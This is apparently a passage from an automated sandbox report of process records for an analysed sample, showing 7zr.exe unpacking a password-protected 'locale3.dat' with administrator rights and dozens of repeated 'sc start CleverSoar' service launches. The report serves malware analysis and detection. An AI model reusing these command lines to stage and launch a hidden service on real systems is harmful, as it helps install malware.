                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:01:42:22
                                                          Start date:23/12/2024
                                                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                                          Imagebase:0x7ff642ec0000
                                                          File size:831'200 bytes
                                                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:01:42:22
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:01:42:23
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff717f30000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:35
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:37
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:42
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:44
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:45
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:46
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:47
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:48
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:49
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:50
                                                          Start time:01:42:24
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:51
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:52
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:53
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:54
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:55
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:56
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:57
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:58
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:59
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:60
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7403e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:61
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:62
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:63
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:64
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:65
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:66
                                                          Start time:01:42:25
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:67
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:68
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:69
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:70
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:71
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:sc start CleverSoar
                                                          Imagebase:0x7ff6ed500000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:72
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:73
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c start sc start CleverSoar
                                                          Imagebase:0x7ff7dc6d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:74
                                                          Start time:01:42:26
                                                          Start date:23/12/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
